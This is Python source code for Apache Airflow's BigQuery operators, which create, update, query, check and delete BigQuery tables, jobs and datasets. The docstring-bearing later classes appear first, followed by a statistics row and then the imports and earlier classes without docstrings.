class BigQueryUpsertTableOperator(BaseOperator):
"""
Upsert BigQuery table
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryUpsertTableOperator`
:param dataset_id: A dotted
``(<project>.|<project>:)<dataset>`` that indicates which dataset
will be updated. (templated)
:type dataset_id: str
:param table_resource: a table resource. see
https://cloud.google.com/bigquery/docs/reference/v2/tables#resource
:type table_resource: dict
:param project_id: The name of the project where we want to update the dataset.
Don't need to provide, if projectId in dataset_reference.
:type project_id: str
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have domain-wide
delegation enabled.
:type delegate_to: str
:param location: The location used for the operation.
:type location: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'dataset_id',
'table_resource',
'impersonation_chain',
)
template_fields_renderers = {"table_resource": "json"}
ui_color = BigQueryUIColors.TABLE.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
table_resource: dict,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.dataset_id = dataset_id
self.table_resource = table_resource
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.location = location
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
self.log.info('Upserting Dataset: %s with table_resource: %s', self.dataset_id, self.table_resource)
hook = BigQueryHook(
bigquery_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
hook.run_table_upsert(
dataset_id=self.dataset_id,
table_resource=self.table_resource,
project_id=self.project_id,
)
class BigQueryUpdateTableSchemaOperator(BaseOperator):
"""
Update BigQuery Table Schema
Updates fields on a table schema based on contents of the supplied schema_fields_updates
parameter. The supplied schema does not need to be complete, if the field
already exists in the schema you only need to supply keys & values for the
items you want to patch, just ensure the "name" key is set.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryUpdateTableSchemaOperator`
:param schema_fields_updates: a partial schema resource. see
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#TableSchema
**Example**: ::
schema_fields_updates=[
{"name": "emp_name", "description": "Some New Description"},
{"name": "salary", "policyTags": {'names': ['some_new_policy_tag']},},
{"name": "departments", "fields": [
{"name": "name", "description": "Some New Description"},
{"name": "type", "description": "Some New Description"}
]},
]
:type schema_fields_updates: List[dict]
:param include_policy_tags: (Optional) If set to True policy tags will be included in
the update request which requires special permissions even if unchanged (default False)
see https://cloud.google.com/bigquery/docs/column-level-security#roles
:type include_policy_tags: bool
:param dataset_id: A dotted
``(<project>.|<project>:)<dataset>`` that indicates which dataset
will be updated. (templated)
:type dataset_id: str
:param table_id: The table ID of the requested table. (templated)
:type table_id: str
:param project_id: The name of the project where we want to update the dataset.
Don't need to provide, if projectId in dataset_reference.
:type project_id: str
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have domain-wide
delegation enabled.
:type delegate_to: str
:param location: The location used for the operation.
:type location: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'schema_fields_updates',
'dataset_id',
'table_id',
'project_id',
'impersonation_chain',
)
template_fields_renderers = {"schema_fields_updates": "json"}
ui_color = BigQueryUIColors.TABLE.value
@apply_defaults
def __init__(
self,
*,
schema_fields_updates: List[Dict[str, Any]],
include_policy_tags: Optional[bool] = False,
dataset_id: Optional[str] = None,
table_id: Optional[str] = None,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
self.schema_fields_updates = schema_fields_updates
self.include_policy_tags = include_policy_tags
self.table_id = table_id
self.dataset_id = dataset_id
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return bq_hook.update_table_schema(
schema_fields_updates=self.schema_fields_updates,
include_policy_tags=self.include_policy_tags,
dataset_id=self.dataset_id,
table_id=self.table_id,
project_id=self.project_id,
)
# pylint: disable=too-many-arguments
class BigQueryInsertJobOperator(BaseOperator):
"""
Executes a BigQuery job. Waits for the job to complete and returns job id.
This operator work in the following way:
- it calculates a unique hash of the job using job's configuration or uuid if ``force_rerun`` is True
- creates ``job_id`` in form of
``[provided_job_id | airflow_{dag_id}_{task_id}_{exec_date}]_{uniqueness_suffix}``
- submits a BigQuery job using the ``job_id``
- if job with given id already exists then it tries to reattach to the job if its not done and its
state is in ``reattach_states``. If the job is done the operator will raise ``AirflowException``.
Using ``force_rerun`` will submit a new job every time without attaching to already existing ones.
For job definition see here:
https://cloud.google.com/bigquery/docs/reference/v2/jobs
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryInsertJobOperator`
:param configuration: The configuration parameter maps directly to BigQuery's
configuration field in the job object. For more details see
https://cloud.google.com/bigquery/docs/reference/v2/jobs
:type configuration: Dict[str, Any]
:param job_id: The ID of the job. It will be suffixed with hash of job configuration
unless ``force_rerun`` is True.
The ID must contain only letters (a-z, A-Z), numbers (0-9), underscores (_), or
dashes (-). The maximum length is 1,024 characters. If not provided then uuid will
be generated.
:type job_id: str
:param force_rerun: If True then operator will use hash of uuid as job id suffix
:type force_rerun: bool
:param reattach_states: Set of BigQuery job's states in case of which we should reattach
to the job. Should be other than final states.
:param project_id: Google Cloud Project where the job is running
:type project_id: str
:param location: location the job is running
:type location: str
:param gcp_conn_id: The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:param cancel_on_kill: Flag which indicates whether cancel the hook's job or not, when on_kill is called
:type cancel_on_kill: bool
"""
template_fields = (
"configuration",
"job_id",
"impersonation_chain",
)
template_ext = (".json",)
template_fields_renderers = {"configuration": "json"}
ui_color = BigQueryUIColors.QUERY.value
@apply_defaults
def __init__(
self,
configuration: Dict[str, Any],
project_id: Optional[str] = None,
location: Optional[str] = None,
job_id: Optional[str] = None,
force_rerun: bool = True,
reattach_states: Optional[Set[str]] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
cancel_on_kill: bool = True,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.configuration = configuration
self.location = location
self.job_id = job_id
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.force_rerun = force_rerun
self.reattach_states: Set[str] = reattach_states or set()
self.impersonation_chain = impersonation_chain
self.cancel_on_kill = cancel_on_kill
self.hook: Optional[BigQueryHook] = None
def prepare_template(self) -> None:
# If .json is passed then we have to read the file
if isinstance(self.configuration, str) and self.configuration.endswith('.json'):
with open(self.configuration) as file:
self.configuration = json.loads(file.read())
def _submit_job(
self,
hook: BigQueryHook,
job_id: str,
) -> BigQueryJob:
# Submit a new job
job = hook.insert_job(
configuration=self.configuration,
project_id=self.project_id,
location=self.location,
job_id=job_id,
)
# Start the job and wait for it to complete and get the result.
job.result()
return job
@staticmethod
def _handle_job_error(job: BigQueryJob) -> None:
if job.error_result:
raise AirflowException(f"BigQuery job {job.job_id} failed: {job.error_result}")
def _job_id(self, context):
if self.force_rerun:
hash_base = str(uuid.uuid4())
else:
hash_base = json.dumps(self.configuration, sort_keys=True)
uniqueness_suffix = hashlib.md5(hash_base.encode()).hexdigest()
if self.job_id:
return f"{self.job_id}_{uniqueness_suffix}"
exec_date = context['execution_date'].isoformat()
job_id = f"airflow_{self.dag_id}_{self.task_id}_{exec_date}_{uniqueness_suffix}"
return re.sub(r"[:\-+.]", "_", job_id)
def execute(self, context: Any):
hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.hook = hook
job_id = self._job_id(context)
try:
job = self._submit_job(hook, job_id)
self._handle_job_error(job)
except Conflict:
# If the job already exists retrieve it
job = hook.get_job(
project_id=self.project_id,
location=self.location,
job_id=job_id,
)
if job.state in self.reattach_states:
# We are reattaching to a job
job.result()
self._handle_job_error(job)
else:
# Same job configuration so we need force_rerun
raise AirflowException(
f"Job with id: {job_id} already exists and is in {job.state} state. If you "
f"want to force rerun it consider setting `force_rerun=True`."
f"Or, if you want to reattach in this scenario add {job.state} to `reattach_states`"
)
self.job_id = job.job_id
return job.job_id
def on_kill(self) -> None:
if self.job_id and self.cancel_on_kill:
self.hook.cancel_job( # type: ignore[union-attr]
job_id=self.job_id, project_id=self.project_id, location=self.location
)
| 42.520566 | 109 | 0.669357 |
import enum
import hashlib
import json
import re
import uuid
import warnings
from datetime import datetime
from typing import Any, Dict, Iterable, List, Optional, Sequence, Set, SupportsAbs, Union
import attr
from google.api_core.exceptions import Conflict
from google.cloud.bigquery import TableReference
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator, BaseOperatorLink
from airflow.models.taskinstance import TaskInstance
from airflow.operators.sql import SQLCheckOperator, SQLIntervalCheckOperator, SQLValueCheckOperator
from airflow.providers.google.cloud.hooks.bigquery import BigQueryHook, BigQueryJob
from airflow.providers.google.cloud.hooks.gcs import GCSHook, _parse_gcs_url
from airflow.utils.decorators import apply_defaults
BIGQUERY_JOB_DETAILS_LINK_FMT = "https://console.cloud.google.com/bigquery?j={job_id}"
_DEPRECATION_MSG = (
"The bigquery_conn_id parameter has been deprecated. You should pass the gcp_conn_id parameter."
)
class BigQueryUIColors(enum.Enum):
CHECK = "#C0D7FF"
QUERY = "#A1BBFF"
TABLE = "#81A0FF"
DATASET = "#5F86FF"
class BigQueryConsoleLink(BaseOperatorLink):
name = 'BigQuery Console'
def get_link(self, operator, dttm):
ti = TaskInstance(task=operator, execution_date=dttm)
job_id = ti.xcom_pull(task_ids=operator.task_id, key='job_id')
return BIGQUERY_JOB_DETAILS_LINK_FMT.format(job_id=job_id) if job_id else ''
@attr.s(auto_attribs=True)
class BigQueryConsoleIndexableLink(BaseOperatorLink):
index: int = attr.ib()
@property
def name(self) -> str:
return f'BigQuery Console #{self.index + 1}'
def get_link(self, operator: BaseOperator, dttm: datetime):
ti = TaskInstance(task=operator, execution_date=dttm)
job_ids = ti.xcom_pull(task_ids=operator.task_id, key='job_id')
if not job_ids:
return None
if len(job_ids) < self.index:
return None
job_id = job_ids[self.index]
return BIGQUERY_JOB_DETAILS_LINK_FMT.format(job_id=job_id)
class _BigQueryDbHookMixin:
def get_db_hook(self) -> BigQueryHook:
return BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
use_legacy_sql=self.use_legacy_sql,
location=self.location,
impersonation_chain=self.impersonation_chain,
labels=self.labels,
)
class BigQueryCheckOperator(_BigQueryDbHookMixin, SQLCheckOperator):
template_fields = (
'sql',
'gcp_conn_id',
'impersonation_chain',
'labels',
)
template_ext = ('.sql',)
ui_color = BigQueryUIColors.CHECK.value
@apply_defaults
def __init__(
self,
*,
sql: str,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
use_legacy_sql: bool = True,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
labels: Optional[dict] = None,
**kwargs,
) -> None:
super().__init__(sql=sql, **kwargs)
if bigquery_conn_id:
warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
gcp_conn_id = bigquery_conn_id
self.gcp_conn_id = gcp_conn_id
self.sql = sql
self.use_legacy_sql = use_legacy_sql
self.location = location
self.impersonation_chain = impersonation_chain
self.labels = labels
class BigQueryValueCheckOperator(_BigQueryDbHookMixin, SQLValueCheckOperator):
template_fields = (
'sql',
'gcp_conn_id',
'pass_value',
'impersonation_chain',
'labels',
)
template_ext = ('.sql',)
ui_color = BigQueryUIColors.CHECK.value
@apply_defaults
def __init__(
self,
*,
sql: str,
pass_value: Any,
tolerance: Any = None,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
use_legacy_sql: bool = True,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
labels: Optional[dict] = None,
**kwargs,
) -> None:
super().__init__(sql=sql, pass_value=pass_value, tolerance=tolerance, **kwargs)
if bigquery_conn_id:
warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
gcp_conn_id = bigquery_conn_id
self.location = location
self.gcp_conn_id = gcp_conn_id
self.use_legacy_sql = use_legacy_sql
self.impersonation_chain = impersonation_chain
self.labels = labels
class BigQueryIntervalCheckOperator(_BigQueryDbHookMixin, SQLIntervalCheckOperator):
template_fields = (
'table',
'gcp_conn_id',
'sql1',
'sql2',
'impersonation_chain',
'labels',
)
ui_color = BigQueryUIColors.CHECK.value
@apply_defaults
def __init__(
self,
*,
table: str,
metrics_thresholds: dict,
date_filter_column: str = 'ds',
days_back: SupportsAbs[int] = -7,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
use_legacy_sql: bool = True,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
labels: Optional[Dict] = None,
**kwargs,
) -> None:
super().__init__(
table=table,
metrics_thresholds=metrics_thresholds,
date_filter_column=date_filter_column,
days_back=days_back,
**kwargs,
)
if bigquery_conn_id:
warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
gcp_conn_id = bigquery_conn_id
self.gcp_conn_id = gcp_conn_id
self.use_legacy_sql = use_legacy_sql
self.location = location
self.impersonation_chain = impersonation_chain
self.labels = labels
class BigQueryGetDataOperator(BaseOperator):
template_fields = (
'dataset_id',
'table_id',
'max_results',
'selected_fields',
'impersonation_chain',
)
ui_color = BigQueryUIColors.QUERY.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
table_id: str,
max_results: int = 100,
selected_fields: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.dataset_id = dataset_id
self.table_id = table_id
self.max_results = int(max_results)
self.selected_fields = selected_fields
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.location = location
self.impersonation_chain = impersonation_chain
def execute(self, context) -> list:
self.log.info(
'Fetching Data from %s.%s max results: %s', self.dataset_id, self.table_id, self.max_results
)
hook = BigQueryHook(
bigquery_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
rows = hook.list_rows(
dataset_id=self.dataset_id,
table_id=self.table_id,
max_results=self.max_results,
selected_fields=self.selected_fields,
location=self.location,
)
self.log.info('Total extracted rows: %s', len(rows))
table_data = [row.values() for row in rows]
return table_data
class BigQueryExecuteQueryOperator(BaseOperator):
template_fields = (
'sql',
'destination_dataset_table',
'labels',
'query_params',
'impersonation_chain',
)
template_ext = ('.sql',)
ui_color = BigQueryUIColors.QUERY.value
@property
def operator_extra_links(self):
if isinstance(self.sql, str):
return (BigQueryConsoleLink(),)
return (BigQueryConsoleIndexableLink(i) for i, _ in enumerate(self.sql))
@apply_defaults
def __init__(
self,
*,
sql: Union[str, Iterable],
destination_dataset_table: Optional[str] = None,
write_disposition: str = 'WRITE_EMPTY',
allow_large_results: Optional[bool] = False,
flatten_results: Optional[bool] = None,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
udf_config: Optional[list] = None,
use_legacy_sql: bool = True,
maximum_billing_tier: Optional[int] = None,
maximum_bytes_billed: Optional[float] = None,
create_disposition: str = 'CREATE_IF_NEEDED',
schema_update_options: Optional[Union[list, tuple, set]] = None,
query_params: Optional[list] = None,
labels: Optional[dict] = None,
priority: str = 'INTERACTIVE',
time_partitioning: Optional[dict] = None,
api_resource_configs: Optional[dict] = None,
cluster_fields: Optional[List[str]] = None,
location: Optional[str] = None,
encryption_configuration: Optional[dict] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
)
gcp_conn_id = bigquery_conn_id
warnings.warn(
"This operator is deprecated. Please use `BigQueryInsertJobOperator`.",
DeprecationWarning,
)
self.sql = sql
self.destination_dataset_table = destination_dataset_table
self.write_disposition = write_disposition
self.create_disposition = create_disposition
self.allow_large_results = allow_large_results
self.flatten_results = flatten_results
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.udf_config = udf_config
self.use_legacy_sql = use_legacy_sql
self.maximum_billing_tier = maximum_billing_tier
self.maximum_bytes_billed = maximum_bytes_billed
self.schema_update_options = schema_update_options
self.query_params = query_params
self.labels = labels
self.priority = priority
self.time_partitioning = time_partitioning
self.api_resource_configs = api_resource_configs
self.cluster_fields = cluster_fields
self.location = location
self.encryption_configuration = encryption_configuration
self.hook = None
self.impersonation_chain = impersonation_chain
def execute(self, context):
if self.hook is None:
self.log.info('Executing: %s', self.sql)
self.hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
use_legacy_sql=self.use_legacy_sql,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
if isinstance(self.sql, str):
job_id = self.hook.run_query(
sql=self.sql,
destination_dataset_table=self.destination_dataset_table,
write_disposition=self.write_disposition,
allow_large_results=self.allow_large_results,
flatten_results=self.flatten_results,
udf_config=self.udf_config,
maximum_billing_tier=self.maximum_billing_tier,
maximum_bytes_billed=self.maximum_bytes_billed,
create_disposition=self.create_disposition,
query_params=self.query_params,
labels=self.labels,
schema_update_options=self.schema_update_options,
priority=self.priority,
time_partitioning=self.time_partitioning,
api_resource_configs=self.api_resource_configs,
cluster_fields=self.cluster_fields,
encryption_configuration=self.encryption_configuration,
)
elif isinstance(self.sql, Iterable):
job_id = [
self.hook.run_query(
sql=s,
destination_dataset_table=self.destination_dataset_table,
write_disposition=self.write_disposition,
allow_large_results=self.allow_large_results,
flatten_results=self.flatten_results,
udf_config=self.udf_config,
maximum_billing_tier=self.maximum_billing_tier,
maximum_bytes_billed=self.maximum_bytes_billed,
create_disposition=self.create_disposition,
query_params=self.query_params,
labels=self.labels,
schema_update_options=self.schema_update_options,
priority=self.priority,
time_partitioning=self.time_partitioning,
api_resource_configs=self.api_resource_configs,
cluster_fields=self.cluster_fields,
encryption_configuration=self.encryption_configuration,
)
for s in self.sql
]
else:
raise AirflowException(f"argument 'sql' of type {type(str)} is neither a string nor an iterable")
context['task_instance'].xcom_push(key='job_id', value=job_id)
def on_kill(self) -> None:
super().on_kill()
if self.hook is not None:
self.log.info('Cancelling running query')
self.hook.cancel_query()
class BigQueryCreateEmptyTableOperator(BaseOperator):
template_fields = (
'dataset_id',
'table_id',
'project_id',
'gcs_schema_object',
'labels',
'view',
'materialized_view',
'impersonation_chain',
)
template_fields_renderers = {"table_resource": "json", "materialized_view": "json"}
ui_color = BigQueryUIColors.TABLE.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
table_id: str,
table_resource: Optional[Dict[str, Any]] = None,
project_id: Optional[str] = None,
schema_fields: Optional[List] = None,
gcs_schema_object: Optional[str] = None,
time_partitioning: Optional[Dict] = None,
bigquery_conn_id: str = 'google_cloud_default',
google_cloud_storage_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
labels: Optional[Dict] = None,
view: Optional[Dict] = None,
materialized_view: Optional[Dict] = None,
encryption_configuration: Optional[Dict] = None,
location: Optional[str] = None,
cluster_fields: Optional[List[str]] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
exists_ok: bool = False,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.project_id = project_id
self.dataset_id = dataset_id
self.table_id = table_id
self.schema_fields = schema_fields
self.gcs_schema_object = gcs_schema_object
self.bigquery_conn_id = bigquery_conn_id
self.google_cloud_storage_conn_id = google_cloud_storage_conn_id
self.delegate_to = delegate_to
self.time_partitioning = {} if time_partitioning is None else time_partitioning
self.labels = labels
self.view = view
self.materialized_view = materialized_view
self.encryption_configuration = encryption_configuration
self.location = location
self.cluster_fields = cluster_fields
self.table_resource = table_resource
self.impersonation_chain = impersonation_chain
self.exists_ok = exists_ok
def execute(self, context) -> None:
bq_hook = BigQueryHook(
gcp_conn_id=self.bigquery_conn_id,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
if not self.schema_fields and self.gcs_schema_object:
gcs_bucket, gcs_object = _parse_gcs_url(self.gcs_schema_object)
gcs_hook = GCSHook(
gcp_conn_id=self.google_cloud_storage_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
schema_fields = json.loads(gcs_hook.download(gcs_bucket, gcs_object))
else:
schema_fields = self.schema_fields
try:
self.log.info('Creating table')
table = bq_hook.create_empty_table(
project_id=self.project_id,
dataset_id=self.dataset_id,
table_id=self.table_id,
schema_fields=schema_fields,
time_partitioning=self.time_partitioning,
cluster_fields=self.cluster_fields,
labels=self.labels,
view=self.view,
materialized_view=self.materialized_view,
encryption_configuration=self.encryption_configuration,
table_resource=self.table_resource,
exists_ok=self.exists_ok,
)
self.log.info(
'Table %s.%s.%s created successfully', table.project, table.dataset_id, table.table_id
)
except Conflict:
self.log.info('Table %s.%s already exists.', self.dataset_id, self.table_id)
class BigQueryCreateExternalTableOperator(BaseOperator):
template_fields = (
'bucket',
'source_objects',
'schema_object',
'destination_project_dataset_table',
'labels',
'table_resource',
'impersonation_chain',
)
template_fields_renderers = {"table_resource": "json"}
ui_color = BigQueryUIColors.TABLE.value
@apply_defaults
def __init__(
self,
*,
bucket: str,
source_objects: List,
destination_project_dataset_table: str,
table_resource: Optional[Dict[str, Any]] = None,
schema_fields: Optional[List] = None,
schema_object: Optional[str] = None,
source_format: str = 'CSV',
compression: str = 'NONE',
skip_leading_rows: int = 0,
field_delimiter: str = ',',
max_bad_records: int = 0,
quote_character: Optional[str] = None,
allow_quoted_newlines: bool = False,
allow_jagged_rows: bool = False,
bigquery_conn_id: str = 'google_cloud_default',
google_cloud_storage_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
src_fmt_configs: Optional[dict] = None,
labels: Optional[Dict] = None,
encryption_configuration: Optional[Dict] = None,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.bucket = bucket
self.source_objects = source_objects
self.schema_object = schema_object
kwargs_passed = any(
[
destination_project_dataset_table,
schema_fields,
source_format,
compression,
skip_leading_rows,
field_delimiter,
max_bad_records,
quote_character,
allow_quoted_newlines,
allow_jagged_rows,
src_fmt_configs,
labels,
encryption_configuration,
]
)
if not table_resource:
warnings.warn(
"Passing table parameters via keywords arguments will be deprecated. "
"Please use provide table definition using `table_resource` parameter."
"You can still use external `schema_object`. ",
DeprecationWarning,
stacklevel=2,
)
if table_resource and kwargs_passed:
raise ValueError("You provided both `table_resource` and exclusive keywords arguments.")
self.table_resource = table_resource
self.destination_project_dataset_table = destination_project_dataset_table
self.schema_fields = schema_fields
self.source_format = source_format
self.compression = compression
self.skip_leading_rows = skip_leading_rows
self.field_delimiter = field_delimiter
self.max_bad_records = max_bad_records
self.quote_character = quote_character
self.allow_quoted_newlines = allow_quoted_newlines
self.allow_jagged_rows = allow_jagged_rows
self.bigquery_conn_id = bigquery_conn_id
self.google_cloud_storage_conn_id = google_cloud_storage_conn_id
self.delegate_to = delegate_to
self.src_fmt_configs = src_fmt_configs or {}
self.labels = labels
self.encryption_configuration = encryption_configuration
self.location = location
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
bq_hook = BigQueryHook(
gcp_conn_id=self.bigquery_conn_id,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
if not self.schema_fields and self.schema_object and self.source_format != 'DATASTORE_BACKUP':
gcs_hook = GCSHook(
gcp_conn_id=self.google_cloud_storage_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
schema_fields = json.loads(gcs_hook.download(self.bucket, self.schema_object))
else:
schema_fields = self.schema_fields
if schema_fields and self.table_resource:
self.table_resource["externalDataConfiguration"]["schema"] = schema_fields
if self.table_resource:
tab_ref = TableReference.from_string(self.destination_project_dataset_table)
bq_hook.create_empty_table(
table_resource=self.table_resource,
project_id=tab_ref.project,
table_id=tab_ref.table_id,
dataset_id=tab_ref.dataset_id,
)
else:
source_uris = [f"gs://{self.bucket}/{source_object}" for source_object in self.source_objects]
bq_hook.create_external_table(
external_project_dataset_table=self.destination_project_dataset_table,
schema_fields=schema_fields,
source_uris=source_uris,
source_format=self.source_format,
compression=self.compression,
skip_leading_rows=self.skip_leading_rows,
field_delimiter=self.field_delimiter,
max_bad_records=self.max_bad_records,
quote_character=self.quote_character,
allow_quoted_newlines=self.allow_quoted_newlines,
allow_jagged_rows=self.allow_jagged_rows,
src_fmt_configs=self.src_fmt_configs,
labels=self.labels,
encryption_configuration=self.encryption_configuration,
)
class BigQueryDeleteDatasetOperator(BaseOperator):
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
project_id: Optional[str] = None,
delete_contents: bool = False,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.dataset_id = dataset_id
self.project_id = project_id
self.delete_contents = delete_contents
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context) -> None:
self.log.info('Dataset id: %s Project id: %s', self.dataset_id, self.project_id)
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
bq_hook.delete_dataset(
project_id=self.project_id, dataset_id=self.dataset_id, delete_contents=self.delete_contents
)
class BigQueryCreateEmptyDatasetOperator(BaseOperator):
template_fields = (
'dataset_id',
'project_id',
'dataset_reference',
'impersonation_chain',
)
template_fields_renderers = {"dataset_reference": "json"}
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: Optional[str] = None,
project_id: Optional[str] = None,
dataset_reference: Optional[Dict] = None,
location: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
exists_ok: bool = False,
**kwargs,
) -> None:
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.dataset_id = dataset_id
self.project_id = project_id
self.location = location
self.gcp_conn_id = gcp_conn_id
self.dataset_reference = dataset_reference if dataset_reference else {}
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
self.exists_ok = exists_ok
